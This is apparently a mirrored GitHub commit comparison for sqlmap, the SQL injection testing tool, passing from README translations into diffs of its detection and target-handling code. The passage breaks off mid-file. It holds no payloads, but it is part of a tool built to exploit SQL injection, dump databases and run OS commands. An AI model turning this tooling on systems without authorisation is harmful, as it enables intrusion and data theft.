mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-07 05:01:30 +00:00
Compare commits
138 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
f1c102a020 | ||
|
|
834ea2d0d8 | ||
|
|
ae972de8fc | ||
|
|
62519eed04 | ||
|
|
222fd856fa | ||
|
|
db94d24db1 | ||
|
|
116c1c8b5c | ||
|
|
afc2a42383 | ||
|
|
44664dd7d6 | ||
|
|
35ba94b3a9 | ||
|
|
24c261d630 | ||
|
|
6a8ea0557c | ||
|
|
721bf4d243 | ||
|
|
e02ce4eb1f | ||
|
|
2f8e8a5f62 | ||
|
|
7de63a7efb | ||
|
|
12f802c70f | ||
|
|
96ffb4b911 | ||
|
|
93cb879e5d | ||
|
|
f67f26cebd | ||
|
|
942ac7733a | ||
|
|
2496db9d96 | ||
|
|
a3249019d9 | ||
|
|
96f80879ff | ||
|
|
96b9950f96 | ||
|
|
30ea219228 | ||
|
|
7c41bc57e7 | ||
|
|
e609bd04ad | ||
|
|
511f2a6d12 | ||
|
|
415ce05a2f | ||
|
|
06deda3223 | ||
|
|
d4170f11f0 | ||
|
|
cb2258fea4 | ||
|
|
c871cedae4 | ||
|
|
3e4130c5e6 | ||
|
|
a6c04a59cb | ||
|
|
53eb44304f | ||
|
|
400339a884 | ||
|
|
8b0c50f25d | ||
|
|
e42b63f51c | ||
|
|
b8f88a079a | ||
|
|
a761e1d165 | ||
|
|
5b6926ae05 | ||
|
|
e862da6d4e | ||
|
|
1ac0704c09 | ||
|
|
b6b51bea9d | ||
|
|
672abe8416 | ||
|
|
fac6712a35 | ||
|
|
68ee1f361b | ||
|
|
62ae149464 | ||
|
|
f071c8500c | ||
|
|
5745d650f8 | ||
|
|
de8ea53d46 | ||
|
|
23081f83db | ||
|
|
4d56a806e8 | ||
|
|
1745bac0ab | ||
|
|
0f9c81965b | ||
|
|
d12b65d38c | ||
|
|
38c70d9799 | ||
|
|
a9a744fec6 | ||
|
|
3c5ee552f0 | ||
|
|
8ca45695ab | ||
|
|
bf40526785 | ||
|
|
9b41efcbe1 | ||
|
|
36f3fd72e6 | ||
|
|
facc54f60b | ||
|
|
4c7da11331 | ||
|
|
e21f67715c | ||
|
|
e38267a61e | ||
|
|
7d147f613f | ||
|
|
591a60bbde | ||
|
|
3f40bf1101 | ||
|
|
d248317b89 | ||
|
|
75fd878242 | ||
|
|
30378c8ae3 | ||
|
|
c9b3b47d6f | ||
|
|
d038d027f9 | ||
|
|
c6577b80d9 | ||
|
|
4a4fa07bdd | ||
|
|
a4ebd5418f | ||
|
|
ba369b73d3 | ||
|
|
614f290217 | ||
|
|
1678b606a2 | ||
|
|
aef5d6667f | ||
|
|
b622c25f9d | ||
|
|
e07ff7168b | ||
|
|
ce48217ada | ||
|
|
b6969df52a | ||
|
|
0e728aa73e | ||
|
|
f93c19ba9d | ||
|
|
dd19527e9c | ||
|
|
a42ddad9c1 | ||
|
|
a2973296a2 | ||
|
|
0961f6a5e9 | ||
|
|
fae965f8b6 | ||
|
|
0d756a8823 | ||
|
|
8df4cc3983 | ||
|
|
5ec44b8346 | ||
|
|
d577c57a11 | ||
|
|
ca24509e19 | ||
|
|
e2d3187a78 | ||
|
|
b4980778dd | ||
|
|
71457fea0e | ||
|
|
34281af3f6 | ||
|
|
7dbbf3ecf5 | ||
|
|
c41c93a404 | ||
|
|
9a7343e9f7 | ||
|
|
e0401104f2 | ||
|
|
9da8d55128 | ||
|
|
864711b434 | ||
|
|
996ad59126 | ||
|
|
6d48df2454 | ||
|
|
55a43a837b | ||
|
|
455d41c6a0 | ||
|
|
eb26dd8984 | ||
|
|
0f34300221 | ||
|
|
93a875ec71 | ||
|
|
0edb4f6680 | ||
|
|
b9b5d07336 | ||
|
|
5f3235ef57 | ||
|
|
dfe42612be | ||
|
|
a0202f7bfd | ||
|
|
6dd9d5b2dd | ||
|
|
0864387885 | ||
|
|
359bfb2704 | ||
|
|
644ea2e3aa | ||
|
|
071132cd56 | ||
|
|
7a18dde2e0 | ||
|
|
e146763399 | ||
|
|
4ce08dcfa3 | ||
|
|
2ca5ddce5f | ||
|
|
addb2445b7 | ||
|
|
4736a525b8 | ||
|
|
d3a08a2d22 | ||
|
|
ee5b5cdcbc | ||
|
|
f3f2c81cec | ||
|
|
1e8df40981 | ||
|
|
389133654e |
@@ -52,6 +52,7 @@ Links
|
||||
Translations
|
||||
----
|
||||
|
||||
* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
|
||||
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
|
||||
@@ -59,6 +60,7 @@ Translations
|
||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||
|
||||
50
doc/translations/README-bg-BG.md
Normal file
50
doc/translations/README-bg-BG.md
Normal file
@@ -0,0 +1,50 @@
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
|
||||
|
||||
Демо снимки
|
||||
----
|
||||
|
||||

|
||||
|
||||
Можете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои функции, качени на wiki.
|
||||
|
||||
Инсталиране
|
||||
----
|
||||
|
||||
Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи.
|
||||
|
||||
Използване
|
||||
----
|
||||
|
||||
За да получите списък с основните опции използвайте:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
За да получите списък с всички опции използвайте:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601).
|
||||
За да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Връзки
|
||||
----
|
||||
|
||||
* Начална страница: http://sqlmap.org
|
||||
* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Упътване: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -35,7 +35,7 @@ Untuk mendapatkan daftar opsi lanjut gunakan:
|
||||
python sqlmap.py -hh
|
||||
|
||||
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
|
||||
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Tautan
|
||||
----
|
||||
|
||||
50
doc/translations/README-pl-PL.md
Normal file
50
doc/translations/README-pl-PL.md
Normal file
@@ -0,0 +1,50 @@
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
||||
|
||||
Zrzuty ekranowe
|
||||
----
|
||||
|
||||

|
||||
|
||||
Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości.
|
||||
|
||||
Instalacja
|
||||
----
|
||||
|
||||
Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6.x** lub **2.7.x** na dowolnej platformie systemowej.
|
||||
|
||||
Sposób użycia
|
||||
----
|
||||
|
||||
Aby uzyskać listę podstawowych funkcji i parametrów użyj polecenia:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601).
|
||||
Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Odnośniki
|
||||
----
|
||||
|
||||
* Strona projektu: http://sqlmap.org
|
||||
* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -1,5 +1,10 @@
|
||||
#!/bin/bash
|
||||
|
||||
if [ ! -f ~/.pypirc ]; then
|
||||
echo "File ~/.pypirc is missing"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
declare -x SCRIPTPATH="${0}"
|
||||
SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
|
||||
VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
|
||||
|
||||
@@ -7,10 +7,12 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
import copy
|
||||
import httplib
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
import socket
|
||||
import subprocess
|
||||
import tempfile
|
||||
import time
|
||||
|
||||
from extra.beep.beep import beep
|
||||
@@ -30,6 +32,7 @@ from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import hashDBWrite
|
||||
from lib.core.common import intersect
|
||||
from lib.core.common import listToStrValue
|
||||
from lib.core.common import openFile
|
||||
from lib.core.common import parseFilePaths
|
||||
from lib.core.common import popValue
|
||||
from lib.core.common import pushValue
|
||||
@@ -55,6 +58,7 @@ from lib.core.enums import HASHDB_KEYS
|
||||
from lib.core.enums import HEURISTIC_TEST
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.enums import HTTPMETHOD
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.enums import NOTE
|
||||
from lib.core.enums import NULLCONNECTION
|
||||
from lib.core.enums import PAYLOAD
|
||||
@@ -63,8 +67,11 @@ from lib.core.enums import REDIRECTION
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapSkipTargetException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
|
||||
from lib.core.settings import CHECK_INTERNET_ADDRESS
|
||||
from lib.core.settings import CHECK_INTERNET_VALUE
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
|
||||
from lib.core.settings import FI_ERROR_REGEX
|
||||
@@ -126,7 +133,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
# then attempt to identify with a simple DBMS specific boolean-based
|
||||
# test what the DBMS may be
|
||||
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
|
||||
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None:
|
||||
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests:
|
||||
kb.heuristicDbms = heuristicCheckDbms(injection)
|
||||
|
||||
# If the DBMS has already been fingerprinted (via DBMS-specific
|
||||
@@ -160,6 +167,13 @@ def checkSqlInjection(place, parameter, value):
|
||||
unionExtended = False
|
||||
trueCode, falseCode = None, None
|
||||
|
||||
if conf.httpCollector is not None:
|
||||
conf.httpCollector.setExtendedArguments({
|
||||
"_title": title,
|
||||
"_place": place,
|
||||
"_parameter": parameter,
|
||||
})
|
||||
|
||||
if stype == PAYLOAD.TECHNIQUE.UNION:
|
||||
configUnion(test.request.char)
|
||||
|
||||
@@ -243,17 +257,23 @@ def checkSqlInjection(place, parameter, value):
|
||||
if payloadDbms is not None:
|
||||
# Skip DBMS-specific test if it does not match the user's
|
||||
# provided DBMS
|
||||
if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
|
||||
if conf.dbms and not intersect(payloadDbms, conf.dbms, True):
|
||||
debugMsg = "skipping test '%s' because " % title
|
||||
debugMsg += "the provided DBMS is %s" % conf.dbms
|
||||
debugMsg += "its declared DBMS is different than provided"
|
||||
logger.debug(debugMsg)
|
||||
continue
|
||||
|
||||
if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
|
||||
debugMsg = "skipping test '%s' because " % title
|
||||
debugMsg += "its declared DBMS is different than provided"
|
||||
logger.debug(debugMsg)
|
||||
continue
|
||||
|
||||
# Skip DBMS-specific test if it does not match the
|
||||
# previously identified DBMS (via DBMS-specific payload)
|
||||
if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
|
||||
debugMsg = "skipping test '%s' because the identified " % title
|
||||
debugMsg += "back-end DBMS is %s" % injection.dbms
|
||||
if injection.dbms and not intersect(payloadDbms, injection.dbms, True):
|
||||
debugMsg = "skipping test '%s' because " % title
|
||||
debugMsg += "its declared DBMS is different than identified"
|
||||
logger.debug(debugMsg)
|
||||
continue
|
||||
|
||||
@@ -491,7 +511,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
if candidates:
|
||||
candidates = sorted(candidates, key=lambda _: len(_))
|
||||
for candidate in candidates:
|
||||
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
|
||||
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
|
||||
conf.string = candidate
|
||||
injectable = True
|
||||
|
||||
@@ -550,14 +570,11 @@ def checkSqlInjection(place, parameter, value):
|
||||
# Perform the test's request and grep the response
|
||||
# body for the test's <grep> regular expression
|
||||
try:
|
||||
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(check, listToStrValue( \
|
||||
[headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \
|
||||
if headers else None), re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
|
||||
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
||||
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||
|
||||
if output:
|
||||
result = output == "1"
|
||||
@@ -607,7 +624,9 @@ def checkSqlInjection(place, parameter, value):
|
||||
|
||||
configUnion(test.request.char, test.request.columns)
|
||||
|
||||
if not Backend.getIdentifiedDbms():
|
||||
if len(kb.dbmsFilter or []) == 1:
|
||||
Backend.forceDbms(kb.dbmsFilter[0])
|
||||
elif not Backend.getIdentifiedDbms():
|
||||
if kb.heuristicDbms is None:
|
||||
warnMsg = "using unescaped version of the test "
|
||||
warnMsg += "because of zero knowledge of the "
|
||||
@@ -738,10 +757,17 @@ def checkSqlInjection(place, parameter, value):
|
||||
warnMsg = "user aborted during detection phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||
choice = readInput(msg, default='S', checkBatch=False).upper()
|
||||
if conf.multipleTargets:
|
||||
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||
choice = readInput(msg, default='T', checkBatch=False).upper()
|
||||
else:
|
||||
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||
choice = readInput(msg, default='S', checkBatch=False).upper()
|
||||
|
||||
if choice == 'C':
|
||||
if choice == 'X':
|
||||
if conf.multipleTargets:
|
||||
raise SqlmapSkipTargetException
|
||||
elif choice == 'C':
|
||||
choice = None
|
||||
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
|
||||
if choice:
|
||||
@@ -818,6 +844,8 @@ def heuristicCheckDbms(injection):
|
||||
infoMsg += "could be '%s' " % retVal
|
||||
logger.info(infoMsg)
|
||||
|
||||
kb.heuristicExtendedDbms = retVal
|
||||
|
||||
return retVal
|
||||
|
||||
def checkFalsePositives(injection):
|
||||
@@ -960,7 +988,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
|
||||
payload = "%s%s%s" % (prefix, randStr, suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload)
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
|
||||
kb.heuristicPage = page
|
||||
kb.heuristicMode = False
|
||||
@@ -1016,7 +1044,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
|
||||
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload)
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||
|
||||
@@ -1125,7 +1153,7 @@ def checkDynamicContent(firstPage, secondPage):
|
||||
warnMsg += ". sqlmap is going to retry the request"
|
||||
logger.critical(warnMsg)
|
||||
|
||||
secondPage, _ = Request.queryPage(content=True)
|
||||
secondPage, _, _ = Request.queryPage(content=True)
|
||||
findDynamicContent(firstPage, secondPage)
|
||||
|
||||
def checkStability():
|
||||
@@ -1148,7 +1176,7 @@ def checkStability():
|
||||
delay = max(0, min(1, delay))
|
||||
time.sleep(delay)
|
||||
|
||||
secondPage, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
|
||||
secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
|
||||
|
||||
if kb.redirectChoice:
|
||||
return None
|
||||
@@ -1230,7 +1258,7 @@ def checkString():
|
||||
infoMsg += "target URL page content"
|
||||
logger.info(infoMsg)
|
||||
|
||||
page, headers = Request.queryPage(content=True)
|
||||
page, headers, _ = Request.queryPage(content=True)
|
||||
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
|
||||
|
||||
if conf.string not in rawResponse:
|
||||
@@ -1249,7 +1277,7 @@ def checkRegexp():
|
||||
infoMsg += "the target URL page content"
|
||||
logger.info(infoMsg)
|
||||
|
||||
page, headers = Request.queryPage(content=True)
|
||||
page, headers, _ = Request.queryPage(content=True)
|
||||
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
|
||||
|
||||
if not re.search(conf.regexp, rawResponse, re.I | re.M):
|
||||
@@ -1277,6 +1305,9 @@ def checkWaf():
|
||||
logger.critical(warnMsg)
|
||||
return _
|
||||
|
||||
if not kb.originalPage:
|
||||
return None
|
||||
|
||||
infoMsg = "checking if the target is protected by "
|
||||
infoMsg += "some kind of WAF/IPS/IDS"
|
||||
logger.info(infoMsg)
|
||||
@@ -1368,6 +1399,18 @@ def identifyWaf():
|
||||
retVal.append(product)
|
||||
|
||||
if retVal:
|
||||
if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
|
||||
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
|
||||
os.close(handle)
|
||||
with openFile(filename, "w+b") as f:
|
||||
f.write(kb.wafSpecificResponse)
|
||||
|
||||
message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
|
||||
message += "If you know the details on used protection please "
|
||||
message += "report it along with specific response "
|
||||
message += "to 'dev@sqlmap.org'"
|
||||
logger.warn(message)
|
||||
|
||||
message = "are you sure that you want to "
|
||||
message += "continue with further target testing? [y/N] "
|
||||
choice = readInput(message, default='N', boolean=True)
|
||||
@@ -1456,7 +1499,7 @@ def checkConnection(suppressOutput=False):
|
||||
|
||||
try:
|
||||
kb.originalPageTime = time.time()
|
||||
page, headers = Request.queryPage(content=True, noteResponseTime=False)
|
||||
page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)
|
||||
kb.originalPage = kb.pageTemplate = page
|
||||
|
||||
kb.errorIsNone = False
|
||||
@@ -1469,9 +1512,10 @@ def checkConnection(suppressOutput=False):
|
||||
warnMsg += "which could interfere with the results of the tests"
|
||||
logger.warn(warnMsg)
|
||||
elif wasLastResponseHTTPError():
|
||||
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
|
||||
warnMsg += "which could interfere with the results of the tests"
|
||||
logger.warn(warnMsg)
|
||||
if getLastRequestHTTPError() != conf.ignoreCode:
|
||||
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
|
||||
warnMsg += "which could interfere with the results of the tests"
|
||||
logger.warn(warnMsg)
|
||||
else:
|
||||
kb.errorIsNone = True
|
||||
|
||||
@@ -1501,6 +1545,10 @@ def checkConnection(suppressOutput=False):
|
||||
|
||||
return True
|
||||
|
||||
def checkInternet():
|
||||
content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
|
||||
return CHECK_INTERNET_VALUE in (content or "")
|
||||
|
||||
def setVerbosity(): # Cross-linked function
|
||||
raise NotImplementedError
|
||||
|
||||
|
||||
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
import os
|
||||
import re
|
||||
import time
|
||||
|
||||
from lib.controller.action import action
|
||||
from lib.controller.checks import checkSqlInjection
|
||||
@@ -15,6 +16,7 @@ from lib.controller.checks import checkStability
|
||||
from lib.controller.checks import checkString
|
||||
from lib.controller.checks import checkRegexp
|
||||
from lib.controller.checks import checkConnection
|
||||
from lib.controller.checks import checkInternet
|
||||
from lib.controller.checks import checkNullConnection
|
||||
from lib.controller.checks import checkWaf
|
||||
from lib.controller.checks import heuristicCheckSqlInjection
|
||||
@@ -52,6 +54,7 @@ from lib.core.exception import SqlmapBaseException
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.exception import SqlmapNotVulnerableException
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapSkipTargetException
|
||||
from lib.core.exception import SqlmapValueException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import ASP_NET_CONTROL_REGEX
|
||||
@@ -276,6 +279,21 @@ def start():
|
||||
|
||||
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
|
||||
try:
|
||||
|
||||
if conf.checkInternet:
|
||||
infoMsg = "[INFO] checking for Internet connection"
|
||||
logger.info(infoMsg)
|
||||
|
||||
if not checkInternet():
|
||||
warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X")
|
||||
dataToStdout(warnMsg)
|
||||
|
||||
while not checkInternet():
|
||||
dataToStdout('.')
|
||||
time.sleep(5)
|
||||
|
||||
dataToStdout("\n")
|
||||
|
||||
conf.url = targetUrl
|
||||
conf.method = targetMethod.upper() if targetMethod else targetMethod
|
||||
conf.data = targetData
|
||||
@@ -649,6 +667,9 @@ def start():
|
||||
else:
|
||||
raise
|
||||
|
||||
except SqlmapSkipTargetException:
|
||||
pass
|
||||
|
||||
except SqlmapUserQuitException:
|
||||
raise
|
||||
|
||||
|
||||
@@ -70,12 +70,22 @@ def setHandler():
|
||||
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
|
||||
]
|
||||
|
||||
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
|
||||
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
|
||||
if _:
|
||||
items.remove(_)
|
||||
items.insert(0, _)
|
||||
|
||||
for dbms, aliases, Handler, Connector in items:
|
||||
if conf.forceDbms:
|
||||
if conf.forceDbms.lower() not in aliases:
|
||||
continue
|
||||
else:
|
||||
kb.dbms = conf.dbms = conf.forceDbms = dbms
|
||||
|
||||
if kb.dbmsFilter:
|
||||
if dbms not in kb.dbmsFilter:
|
||||
continue
|
||||
|
||||
handler = Handler()
|
||||
conf.dbmsConnector = Connector()
|
||||
|
||||
@@ -96,7 +106,7 @@ def setHandler():
|
||||
else:
|
||||
conf.dbmsConnector.connect()
|
||||
|
||||
if handler.checkDbms():
|
||||
if conf.forceDbms == dbms or handler.checkDbms():
|
||||
if kb.resolutionDbms:
|
||||
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
|
||||
else:
|
||||
|
||||
@@ -36,7 +36,6 @@ from lib.core.enums import POST_HINT
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
|
||||
from lib.core.settings import BOUNDED_INJECTION_MARKER
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
